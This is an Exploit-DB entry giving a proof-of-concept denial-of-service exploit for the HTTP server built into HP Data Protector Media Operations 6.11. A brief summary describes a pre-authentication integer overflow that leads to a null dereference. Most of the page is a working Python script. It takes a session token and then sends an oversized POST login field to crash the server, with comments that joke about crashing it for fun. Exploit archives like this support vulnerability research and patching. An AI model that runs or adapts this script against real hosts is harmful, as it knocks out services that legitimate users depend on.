HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service

EDB-ID:

15307

CVE:


EDB Verified:

Author:

d0lc3

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2010-10-23

Vulnerable App: 
# Exploit Title: HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
# Date: [date]:	17/09/10
# Author: d0lc3 (@rmallof http://elotrolad0.blogspot.com/)
# Software Link: http://www.hp.com
# Version: 6.11
# Tested on: Windows XP SP3 Spa
#
#Sumary:
"""
HP Data Protector Media Operations has embebed HTTP server, allowing access through
this protocol for users.

Flaw was detected on this implementation, causing remote and pre-authenticated DoS: Integer Overflow 
handling string sended length through POST method.

Integer Overflow causes unexpected variable initiation (reset to 0) followed by its dereferenciation
(NUll Dereference), crashing server and thus deniying service to legitimate users.

This is not explpoitable.
"""
#PoC:

#!/usr/bin/python

import socket,sys,time,os
#global vars
neg="GET / HTTP/1.1\r\n\r\n"
lim0="Location:"						
lim1="&"
lim2="sess="
buf="SignInName="+("A"*0x8000)+"&SignInPassword=FOO&Sign+In=Log+In" # >= 0x8000 to int overflow

def CV():
	os.system("clear")
	print"\t-HP Data Protector Media Operations 6.11-"
	print"\t    -HTTP Remote Denial of Service-"
	print"\n[+] Researcher:\tRoi Mallo (@rmallof)"
	print"[+] Blog:\thttp://elotrolad0.blogspot.com/"
	print"[+] Twitter:\thttps://www.twitter.com/rmallof"
	print"\n\n"

def nego(h):									#starting connection and getting session
	s=socket.socket()
	try:
		s.connect(h)
	except:
		print"[x] Error connecting to remote host!"
		sys.exit(0)
	s.send(neg)
	time.sleep(1)
	rec=s.recv(1024)
	s.close()
	return rec

def buildPOST(s,h,p,b):								#building POST request for crashes server
	P="POST /4daction/wHandleURLs/handleSignIn?sess="+s+"&siteCode=0&lang=en& HTTP/1.1\r\n"
	P+="Host: "+h+"\r\n"
	P+="User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\r\n"
	P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
	P+="Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
	P+="Accept-Encoding: gzip,deflate\r\n"
	P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
	P+="Keep-Alive: 115\r\n"
	P+="Connection: keep-alive\r\n"
	P+="Referer: http://"+h+p+"\r\n"
	P+="Content-Type: application/x-www-form-urlencoded\r\n"
	P+="Content-Length: %s\r\n" % str(len(b))
	P+="\r\n"
	P+=b
	time.sleep(1)
	return P

def main():
	CV()		
	if len(sys.argv)!=2:
		print"\n[x] Usage: "+sys.argv[0]+" <host>\n\n"							
		sys.exit(0)
	else:
		host=sys.argv[1]
		hostd=host,80
	#1
	print"[-] Getting HTTP session..."
	r=nego(hostd)								#getting new session...
	path=r[r.index(lim0)+len(lim0)+1:r.rindex(lim1)+1]			#search for PATH
	sess=path[path.index(lim2)+len(lim2):path.index(lim1)+len(lim1)-1]	#search for SESSION hash
	time.sleep(1)
	print"[+] 0k, session ="+sess
	time.sleep(1)
	#2
	s=socket.socket()
	s.connect(hostd)
	print"[-] Bulding POST [Content-Length: %d bytes]..." % len(buf)
	POST=buildPOST(sess,host,path,buf)					#build POST request with new session
	print"[+] Done, Sayonara ;)"
	s.send(POST)								#crash it 4fun&profit :)
	time.sleep(1)							
	s.close()
if __name__=="__main__":
	main()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services